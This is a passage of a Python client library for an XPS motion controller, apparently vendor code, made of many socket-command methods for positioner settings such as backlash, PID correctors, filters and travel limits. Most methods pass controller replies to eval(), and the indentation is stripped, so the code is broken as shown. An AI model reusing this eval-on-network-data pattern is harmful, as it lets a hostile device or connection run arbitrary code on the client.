while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerAnalogTrackingVelocityParametersSet : Update dynamic parameters for one axe of a group for a future analog tracking velocity
def PositionerAnalogTrackingVelocityParametersSet (self, socketId, PositionerName, GPIOName, Offset, Scale, DeadBandThreshold, Order, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerAnalogTrackingVelocityParametersSet(' + PositionerName + ',' + GPIOName + ',' + str(Offset) + ',' + str(Scale) + ',' + str(DeadBandThreshold) + ',' + str(Order) + ',' + str(Velocity) + ',' + str(Acceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerBacklashGet : Read backlash value and status
def PositionerBacklashGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashGet(' + PositionerName + ',double *,char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerBacklashSet : Set backlash value
def PositionerBacklashSet (self, socketId, PositionerName, BacklashValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashSet(' + PositionerName + ',' + str(BacklashValue) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerBacklashEnable : Enable the backlash
def PositionerBacklashEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerBacklashDisable : Disable the backlash
def PositionerBacklashDisable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerBacklashDisable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorNotchFiltersSet : Update filters parameters
def PositionerCorrectorNotchFiltersSet (self, socketId, PositionerName, NotchFrequency1, NotchBandwith1, NotchGain1, NotchFrequency2, NotchBandwith2, NotchGain2):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorNotchFiltersSet(' + PositionerName + ',' + str(NotchFrequency1) + ',' + str(NotchBandwith1) + ',' + str(NotchGain1) + ',' + str(NotchFrequency2) + ',' + str(NotchBandwith2) + ',' + str(NotchGain2) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorNotchFiltersGet : Read filters parameters
def PositionerCorrectorNotchFiltersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorNotchFiltersGet(' + PositionerName + ',double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(6):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIDFFAccelerationSet : Update corrector parameters
def PositionerCorrectorPIDFFAccelerationSet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, KD, KS, IntegrationTime, DerivativeFilterCutOffFrequency, GKP, GKI, GKD, KForm, FeedForwardGainAcceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFAccelerationSet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(KD) + ',' + str(KS) + ',' + str(IntegrationTime) + ',' + str(DerivativeFilterCutOffFrequency) + ',' + str(GKP) + ',' + str(GKI) + ',' + str(GKD) + ',' + str(KForm) + ',' + str(FeedForwardGainAcceleration) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIDFFAccelerationGet : Read corrector parameters
def PositionerCorrectorPIDFFAccelerationGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFAccelerationGet(' + PositionerName + ',bool *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(12):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIDFFVelocitySet : Update corrector parameters
def PositionerCorrectorPIDFFVelocitySet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, KD, KS, IntegrationTime, DerivativeFilterCutOffFrequency, GKP, GKI, GKD, KForm, FeedForwardGainVelocity):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFVelocitySet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(KD) + ',' + str(KS) + ',' + str(IntegrationTime) + ',' + str(DerivativeFilterCutOffFrequency) + ',' + str(GKP) + ',' + str(GKI) + ',' + str(GKD) + ',' + str(KForm) + ',' + str(FeedForwardGainVelocity) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIDFFVelocityGet : Read corrector parameters
def PositionerCorrectorPIDFFVelocityGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDFFVelocityGet(' + PositionerName + ',bool *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(12):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIDDualFFVoltageSet : Update corrector parameters
def PositionerCorrectorPIDDualFFVoltageSet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, KD, KS, IntegrationTime, DerivativeFilterCutOffFrequency, GKP, GKI, GKD, KForm, FeedForwardGainVelocity, FeedForwardGainAcceleration, Friction):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDDualFFVoltageSet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(KD) + ',' + str(KS) + ',' + str(IntegrationTime) + ',' + str(DerivativeFilterCutOffFrequency) + ',' + str(GKP) + ',' + str(GKI) + ',' + str(GKD) + ',' + str(KForm) + ',' + str(FeedForwardGainVelocity) + ',' + str(FeedForwardGainAcceleration) + ',' + str(Friction) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIDDualFFVoltageGet : Read corrector parameters
def PositionerCorrectorPIDDualFFVoltageGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIDDualFFVoltageGet(' + PositionerName + ',bool *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(14):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorPIPositionSet : Update corrector parameters
def PositionerCorrectorPIPositionSet (self, socketId, PositionerName, ClosedLoopStatus, KP, KI, IntegrationTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIPositionSet(' + PositionerName + ',' + str(ClosedLoopStatus) + ',' + str(KP) + ',' + str(KI) + ',' + str(IntegrationTime) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCorrectorPIPositionGet : Read corrector parameters
def PositionerCorrectorPIPositionGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorPIPositionGet(' + PositionerName + ',bool *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCorrectorTypeGet : Read corrector type
def PositionerCorrectorTypeGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCorrectorTypeGet(' + PositionerName + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerCurrentVelocityAccelerationFiltersGet : Get current velocity and acceleration cutoff frequencies
def PositionerCurrentVelocityAccelerationFiltersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCurrentVelocityAccelerationFiltersGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerCurrentVelocityAccelerationFiltersSet : Set current velocity and acceleration cutoff frequencies
def PositionerCurrentVelocityAccelerationFiltersSet (self, socketId, PositionerName, CurrentVelocityCutOffFrequency, CurrentAccelerationCutOffFrequency):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerCurrentVelocityAccelerationFiltersSet(' + PositionerName + ',' + str(CurrentVelocityCutOffFrequency) + ',' + str(CurrentAccelerationCutOffFrequency) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDriverFiltersGet : Get driver filters parameters
def PositionerDriverFiltersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverFiltersGet(' + PositionerName + ',double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(5):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDriverFiltersSet : Set driver filters parameters
def PositionerDriverFiltersSet (self, socketId, PositionerName, KI, NotchFrequency, NotchBandwidth, NotchGain, LowpassFrequency):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverFiltersSet(' + PositionerName + ',' + str(KI) + ',' + str(NotchFrequency) + ',' + str(NotchBandwidth) + ',' + str(NotchGain) + ',' + str(LowpassFrequency) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDriverPositionOffsetsGet : Get driver stage and gage position offset
def PositionerDriverPositionOffsetsGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverPositionOffsetsGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerDriverStatusGet : Read positioner driver status
def PositionerDriverStatusGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverStatusGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerDriverStatusStringGet : Return the positioner driver status string corresponding to the positioner error code
def PositionerDriverStatusStringGet (self, socketId, PositionerDriverStatus):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerDriverStatusStringGet(' + str(PositionerDriverStatus) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerEncoderAmplitudeValuesGet : Read analog interpolated encoder amplitude values
def PositionerEncoderAmplitudeValuesGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerEncoderAmplitudeValuesGet(' + PositionerName + ',double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerEncoderCalibrationParametersGet : Read analog interpolated encoder calibration parameters
def PositionerEncoderCalibrationParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerEncoderCalibrationParametersGet(' + PositionerName + ',double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerErrorGet : Read and clear positioner error code
def PositionerErrorGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerErrorRead : Read only positioner error code without clear it
def PositionerErrorRead (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorRead(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerErrorStringGet : Return the positioner status string corresponding to the positioner error code
def PositionerErrorStringGet (self, socketId, PositionerErrorCode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerErrorStringGet(' + str(PositionerErrorCode) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerExcitationSignalGet : Read disturbing signal parameters
def PositionerExcitationSignalGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerExcitationSignalGet(' + PositionerName + ',int *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerExcitationSignalSet : Update disturbing signal parameters
def PositionerExcitationSignalSet (self, socketId, PositionerName, Mode, Frequency, Amplitude, Time):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerExcitationSignalSet(' + PositionerName + ',' + str(Mode) + ',' + str(Frequency) + ',' + str(Amplitude) + ',' + str(Time) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerExternalLatchPositionGet : Read external latch position
def PositionerExternalLatchPositionGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerExternalLatchPositionGet(' + PositionerName + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerHardwareStatusGet : Read positioner hardware status
def PositionerHardwareStatusGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardwareStatusGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerHardwareStatusStringGet : Return the positioner hardware status string corresponding to the positioner error code
def PositionerHardwareStatusStringGet (self, socketId, PositionerHardwareStatus):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardwareStatusStringGet(' + str(PositionerHardwareStatus) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerHardInterpolatorFactorGet : Get hard interpolator parameters
def PositionerHardInterpolatorFactorGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardInterpolatorFactorGet(' + PositionerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerHardInterpolatorFactorSet : Set hard interpolator parameters
def PositionerHardInterpolatorFactorSet (self, socketId, PositionerName, InterpolationFactor):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerHardInterpolatorFactorSet(' + PositionerName + ',' + str(InterpolationFactor) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerMaximumVelocityAndAccelerationGet : Return maximum velocity and acceleration of the positioner
def PositionerMaximumVelocityAndAccelerationGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerMaximumVelocityAndAccelerationGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerMotionDoneGet : Read motion done parameters
def PositionerMotionDoneGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerMotionDoneGet(' + PositionerName + ',double *,double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(5):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerMotionDoneSet : Update motion done parameters
def PositionerMotionDoneSet (self, socketId, PositionerName, PositionWindow, VelocityWindow, CheckingTime, MeanPeriod, TimeOut):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerMotionDoneSet(' + PositionerName + ',' + str(PositionWindow) + ',' + str(VelocityWindow) + ',' + str(CheckingTime) + ',' + str(MeanPeriod) + ',' + str(TimeOut) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareAquadBAlwaysEnable : Enable AquadB signal in always mode
def PositionerPositionCompareAquadBAlwaysEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareAquadBAlwaysEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareAquadBWindowedGet : Read position compare AquadB windowed parameters
def PositionerPositionCompareAquadBWindowedGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareAquadBWindowedGet(' + PositionerName + ',double *,double *,bool *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(3):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerPositionCompareAquadBWindowedSet : Set position compare AquadB windowed parameters
def PositionerPositionCompareAquadBWindowedSet (self, socketId, PositionerName, MinimumPosition, MaximumPosition):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareAquadBWindowedSet(' + PositionerName + ',' + str(MinimumPosition) + ',' + str(MaximumPosition) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareGet : Read position compare parameters
def PositionerPositionCompareGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareGet(' + PositionerName + ',double *,double *,double *,bool *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerPositionCompareSet : Set position compare parameters
def PositionerPositionCompareSet (self, socketId, PositionerName, MinimumPosition, MaximumPosition, PositionStep):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareSet(' + PositionerName + ',' + str(MinimumPosition) + ',' + str(MaximumPosition) + ',' + str(PositionStep) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareEnable : Enable position compare
def PositionerPositionCompareEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionCompareDisable : Disable position compare
def PositionerPositionCompareDisable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionCompareDisable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerPositionComparePulseParametersGet : Get position compare PCO pulse parameters
def PositionerPositionComparePulseParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionComparePulseParametersGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerPositionComparePulseParametersSet : Set position compare PCO pulse parameters
def PositionerPositionComparePulseParametersSet (self, socketId, PositionerName, PCOPulseWidth, EncoderSettlingTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerPositionComparePulseParametersSet(' + PositionerName + ',' + str(PCOPulseWidth) + ',' + str(EncoderSettlingTime) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerRawEncoderPositionGet : Get the raw encoder position
def PositionerRawEncoderPositionGet (self, socketId, PositionerName, UserEncoderPosition):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerRawEncoderPositionGet(' + PositionerName + ',' + str(UserEncoderPosition) + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionersEncoderIndexDifferenceGet : Return the difference between index of primary axis and secondary axis (only after homesearch)
def PositionersEncoderIndexDifferenceGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionersEncoderIndexDifferenceGet(' + PositionerName + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerSGammaExactVelocityAjustedDisplacementGet : Return adjusted displacement to get exact velocity
def PositionerSGammaExactVelocityAjustedDisplacementGet (self, socketId, PositionerName, DesiredDisplacement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaExactVelocityAjustedDisplacementGet(' + PositionerName + ',' + str(DesiredDisplacement) + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# PositionerSGammaParametersGet : Read dynamic parameters for one axe of a group for a future displacement
def PositionerSGammaParametersGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaParametersGet(' + PositionerName + ',double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerSGammaParametersSet : Update dynamic parameters for one axe of a group for a future displacement
def PositionerSGammaParametersSet (self, socketId, PositionerName, Velocity, Acceleration, MinimumTjerkTime, MaximumTjerkTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaParametersSet(' + PositionerName + ',' + str(Velocity) + ',' + str(Acceleration) + ',' + str(MinimumTjerkTime) + ',' + str(MaximumTjerkTime) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerSGammaPreviousMotionTimesGet : Read SettingTime and SettlingTime
def PositionerSGammaPreviousMotionTimesGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerSGammaPreviousMotionTimesGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerStageParameterGet : Return the stage parameter
def PositionerStageParameterGet (self, socketId, PositionerName, ParameterName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerStageParameterGet(' + PositionerName + ',' + ParameterName + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerStageParameterSet : Save the stage parameter
def PositionerStageParameterSet (self, socketId, PositionerName, ParameterName, ParameterValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerStageParameterSet(' + PositionerName + ',' + ParameterName + ',' + ParameterValue + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerTimeFlasherGet : Read time flasher parameters
def PositionerTimeFlasherGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherGet(' + PositionerName + ',double *,double *,double *,bool *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerTimeFlasherSet : Set time flasher parameters
def PositionerTimeFlasherSet (self, socketId, PositionerName, MinimumPosition, MaximumPosition, TimeInterval):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherSet(' + PositionerName + ',' + str(MinimumPosition) + ',' + str(MaximumPosition) + ',' + str(TimeInterval) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerTimeFlasherEnable : Enable time flasher
def PositionerTimeFlasherEnable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherEnable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerTimeFlasherDisable : Disable time flasher
def PositionerTimeFlasherDisable (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerTimeFlasherDisable(' + PositionerName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerUserTravelLimitsGet : Read UserMinimumTarget and UserMaximumTarget
def PositionerUserTravelLimitsGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerUserTravelLimitsGet(' + PositionerName + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# PositionerUserTravelLimitsSet : Update UserMinimumTarget and UserMaximumTarget
def PositionerUserTravelLimitsSet (self, socketId, PositionerName, UserMinimumTarget, UserMaximumTarget):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'PositionerUserTravelLimitsSet(' + PositionerName + ',' + str(UserMinimumTarget) + ',' + str(UserMaximumTarget) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# PositionerDACOffsetGet : Get DAC offsets
